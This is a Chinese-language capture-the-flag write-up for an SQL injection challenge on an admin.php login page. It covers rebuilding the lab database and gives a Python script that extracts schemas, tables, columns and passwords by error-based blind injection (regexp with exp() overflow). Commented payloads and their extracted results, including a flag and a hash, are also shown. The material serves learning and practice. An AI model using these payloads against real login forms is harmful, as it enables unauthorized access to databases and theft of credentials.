一,题目描述
简而言之,附件中是一条连接,题目访问url/admin.php可以进入下图页面
很明显,这是一道SQL注入。
二,环境复现
环境复现的附件我就放在,资源里面了,大家可以免费下载。
需要创建一个数据库ddctf(解释一下,我的英文ID是daydream,本人没有冒犯"DDCTF"的意思),然后引用source.sql。
admin.php也经过了测试,waf使用的是非完全版——即不一定完全与比赛当时的waf相同。
三,playload和exp
playload放在exp里面了。
# -*- coding:utf-8 -*-
import requests
url = 'http://1.116.103.114:84/admin/admin.php'
strings = "abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ_{},-\\{\\}_"
#爆库:user=' or (select if(group_concat(distinct table_schema) regexp '^{}',exp(100000),1) from information_schema.tables)#&pass=mochu7&submit=%E7%99%BB%E5%BD%95
#结果InfORmATIOn_SchEmA,ddcTf,mYSQl,PERfORmAncE_SchEmA,SEcURITY
#爆表:user=' or (select if(group_concat(distinct table_name) regexp '^{}',exp(100000),1) from information_schema.tables where table_schema regexp 'ddctf')#&pass=mochu7&submit=%E7%99%BB%E5%BD%95
#结果:user_flag
#爆列名:user=' or (select if(group_concat(distinct column_name) regexp '^{}',exp(10000),1) from information_schema.columns where table_name regexp 'flag')#&pass=mochu7&submit=%E7%99%BB%E5%BD%95
#结果:id,username,password
#爆字段:user=' or (select if(group_concat(password) regexp '^{}',exp(10000),1) from ddctf.user_flag)#&pass=mochu7&submit=%E7%99%BB%E5%BD%95
#结果:admin,daydream,flag{the_sql_f14g_0f_daydream},874a0300d72a3676c4413ce52454eff7
payload = "user=' or (select if(group_concat(distinct table_name) regexp '^{}',exp(100000),1) from information_schema.tables where table_schema regexp 'ddctf')#&pass=mochu7&submit=%E7%99%BB%E5%BD%95"
res = ''
f = ''
headers = {'Content-Type':'application/x-www-form-urlencoded'}
for i in range(20):#20为字符长度
for c in strings:
if res == '':
pay = payload.format(c)
print(pay)
r = requests.post(url=url, data=pay,headers=headers).text
#print(pay)
else:
pay = payload.format(res+c)
r = requests.post(url=url, data=pay,headers=headers).text
#print(pay)
#print(r)
if 'DOUBLE' in r:#DOUBLE为布尔式返回结果
res += c
f += c
print(f)
break
四,学习与收获
第一此了解到mysql可以使用正则匹配(好吧,就是我没有系统学习mysql),还学习了group contact的相关语法。把我的学习结果附在下面吧。
五,个人心得
主要是这篇大佬博客的具体内容写得不是很详细
还有描述不到位的地方,我就不提了,相信大家看上面的总结应该可以很快的理解这道题目的原理。
这里吐槽大佬一下,注入的流程不应该是“爆库”->“爆表”->“爆列名”->“爆字段”吗?